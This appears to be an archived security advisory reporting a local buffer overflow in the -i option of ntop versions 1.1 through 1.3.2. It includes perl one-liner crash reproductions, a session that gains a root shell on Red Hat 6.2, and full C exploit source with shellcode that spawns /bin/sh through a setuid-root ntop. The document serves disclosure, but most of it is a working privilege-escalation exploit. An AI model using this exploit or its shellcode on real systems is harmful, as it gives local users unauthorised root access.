COMMAND

    ntop

SYSTEMS AFFECTED

    ntop 1.1, ntop 1.2.a7, ntop 1.3.1, ntop 1.3.2

PROBLEM

    Christophe  Bailleux  found  following.   All  ntop  versions  are
    vulnerabled to local buffer  overflow attack in there  -i options.
    Ntop must be owned by root  with a setuid bit for the  attacker to
    gain root privileges.

    a) ntop 1.1

        tshaw:/home/cb/ntop-1.1/$ ./ntop -i `perl -e 'print "A"x208'`
        ntop v.1.1 MT [i686-pc-linux-gnu] listening on AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

        Host      Act   -Rcvd-      Sent       TCP     UDP  ICMP
        Segmentation fault
        tshaw:/home/cb/SRCAUDIT/ntop-1.1$

    b) ntop 1.2a7

        tshaw:/home/cb/ntop-1.2a7$ ./ntop -i `perl -e 'print "A"x109'`
        Segmentation fault
        tshaw:/home/cb/SRCAUDIT/ntop-1.2a7$

    c) ntop 1.3.1

        tshaw:/home/cb/ntop-1.3.1$ ./ntop -i `perl -e 'print "A"x271'`
        Segmentation fault
        tshaw:/home/cb/SRCAUDIT/ntop-1.3.1$

    d) ntop 1.3.2

        tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`

        24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00 07:04:32 PM build)
        24/Oct/2000:12:32:16 Listening on
        [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
        24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <deri@ntop.org>
        24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/
        24/Oct/2000:12:32:16 Initialising...
        Segmentation fault
        tshaw:/home/cb/ntop-1.3.2$

    Exploit was tested on redhat 6.2 (Zoot) where ntop is installed by
    default with the bit setuid root

        [cb@nux cb]$ cat /etc/redhat-release
        Red Hat Linux release 6.2 (Zoot)
        [cb@nux cb]$ rpm -qf /sbin/ntop
        ntop-1.1-1
        [cb@nux cb]$ id
        uid=535(cb) gid=535(cb) groups=535(cb)
        [cb@nux cb]$ ./expl

        ntop v.1.1 MT [i586-pc-linux-gnu] listening on
        ..............................

        Host        Act   -Rcvd-      Sent    TCP   UDP ICMP
        bash#
        bash# id
        uid=0(root) gid=535(cb) egid=3(sys) groups=535(cb)
        bash# exit
        [cb@nux cb]$

    Exploit:

    #include <stdlib.h>
    #include <string.h>
    #include <stdio.h>
    
    #define LEN 208
    
    int main (int argc, char **argv)
    {
      char buf[LEN + 12];
      int  ret = 0xbffffba0;
      int  *p;
    
      char code[]=
          "\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80"
          "\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
          "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
          "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
          "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    
      if (argc > 1) {
        ret += atoi(argv[1]);
        fprintf(stderr, "Using ret %#010x\n", ret);
      }
    
      memset(buf, '\x90', LEN);
      memcpy(buf + LEN - strlen(code), code, strlen(code));
    
      p = (int *) (buf + LEN);
    
      *p++ = ret;
      *p++ = ret;
      *p   = 0;
    
     execl("./ntop", "ntop", "-i", buf, NULL);
    
    }

SOLUTION

    Upgrade to latest version.